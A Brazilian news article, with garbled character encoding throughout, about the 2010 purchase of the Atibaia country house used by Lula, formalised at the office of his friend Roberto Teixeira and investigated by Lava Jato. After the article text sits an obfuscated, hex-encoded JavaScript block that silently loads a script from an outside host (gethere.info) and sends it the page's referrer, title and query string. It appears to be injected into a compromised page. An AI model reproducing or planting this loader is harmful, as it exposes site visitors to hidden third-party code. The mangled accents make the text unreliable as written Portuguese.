Home » Brasil » Governo » Compra de sA�tio foi lavrada em escritA?rio de compadre de Lula

Compra de sA�tio foi lavrada em escritA?rio de compadre de Lula

AquisiA�A?o foi formalizada no escritA?rio do advogado Roberto Teixeira, que A� amigo de longa data do ex-presidente e padrinho do seu filho caA�ula

A compra do sA�tio usado pelo ex-presidente Luiz InA?cio Lula da Silva em Atibaia (SP) foi formalizada no escritA?rio do advogado e empresA?rio Roberto Teixeira, compadre do petista, no bairro dos Jardins, em SA?o Paulo. O imA?vel custou 1,5 milhA?o de reais, em outubro de 2010, dos quais 100 mil reais foram pagos em dinheiro em espA�cie.

As informaA�A�es constam das escrituras de compra e venda das duas A?reas que compA�em o imA?vel de 173 mil mA?, investigado pela OperaA�A?o Lava Jato sob suspeita de ter sido reformado a mando de empreiteiras que tiveram ex-executivos condenados na JustiA�a por envolvimento no esquema de desvios e de propinas da Petrobras.

Segundo o documento, Fernando Bittar, filho do ex-prefeito de Campinas (SP) JacA? Bittar, amigo de Lula, pagou 500 mil reais por uma parte do sA�tio e Jonas Suassuna, primo do ex-senador Ney Suassuna, arcou com 1 milhA?o de reais. Ambos sA?o sA?cios de FA?bio LuA�s Lula da Silva, o Lulinha, filho de Lula.

Dos 500 mil reais pagos por Bittar, 100 mil foram “recebidos em boa e corrente moeda nacional”. O restante foi pago em dois cheques do Banco do Brasil. O negA?cio foi formalizado no dia 29 de outubro de 2010, dois dias antes da eleiA�A?o da presidente Dilma Rousseff, no 19A? andar de um prA�dio de escritA?rios na Rua Padre JoA?o Manoel, nos Jardins. O endereA�o A� o do escritA?rio de Teixeira. Por meio de sua assessoria, o advogado confirmou que a escritura foi lavrada em seu escritA?rio porque Bittar e Suassuna sA?o seus clientes antigos.

Teixeira A� amigo de Lula desde os anos 1980 e padrinho de LuA�s Claudio, caA�ula de Lula. Durante anos o ex-presidente morou em uma casa pertencente ao empresA?rio em SA?o Bernardo do Campo (SP). Teixeira tambA�m intermediou a compra da cobertura duplex onde Lula mora atualmente em SA?o Bernardo e A� um dos proprietA?rios do apartamento onde vive LuA�s Claudio.

O agrimensor ClA?udio Benatti disse ter sido contratado por Teixeira em 18 de dezembro de 2010 para comeA�ar os serviA�os no sA�tio em 20 de janeiro de 2011, em carA?ter de urgA?ncia no sA�tio. Lula deixou o Planalto naquele mA?s e parte da sua mudanA�a foi levada para o sA�tio. Benatti deve prestar depoimento na semana que vem A� Lava Jato.

Conforme os documentos do sA�tio, a compra havia sido fechada pelo menos dois meses antes, no dia 5 de agosto de 2010, por meio de um Instrumento Particular de Compra e Venda firmado entre os compradores e o antigo dono, Adalton Santarelli, um comerciante de SA?o Paulo.

O sA�tio usado por Lula e sua famA�lia em Atibaia A� alvo de investigaA�A?o da OperaA�A?o Lava Jato. Segundo relatos de comerciantes locais e prestadores de serviA�o, parte da reforma foi bancada pelas empreiteiras OAS e Odebrecht, ambas investigadas na OperaA�A?o.

A chegada da Lava Jato mudou a rotina do bairro do PortA?o, em Atibaia (SP), limite entre a cidade e a A?rea rural onde fica o sA�tio usado pelo ex-presidente. Vizinhos e comerciantes da regiA?o tA?m sido questionados pelos procuradores do MinistA�rio PA?blico Federal sobre a frequA?ncia das visitas, rotina e companhias do petista no local.

No depA?sito Dias, que forneceu parte do material para a reforma do imA?vel, em 2011, os procuradores realizaram duas buscas de documentos e notas fiscais da A�poca. O atual dono, Nestor Neto, que assumiu a loja em 2014, afirmou que o objetivo era encontrar provas e buscar novas informaA�A�es. HA? suspeita de que a Odebrecht pagou parte da conta. “Os procuradores analisaram algumas documentaA�A�es antigas, como notas e comprovantes, que ainda estavam na loja. Acessaram salas que estavam fechadas pelo dono do prA�dio e eu nA?o tinha mais acesso”, disse Neto. Duas atendentes da padaria Iannuzzi, que fica no acesso ao sA�tio, dizem que a ex-primeira-dama Marisa LetA�cia comprava no local.

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Redação Brasil (m)

Login

Perdeu sua senha?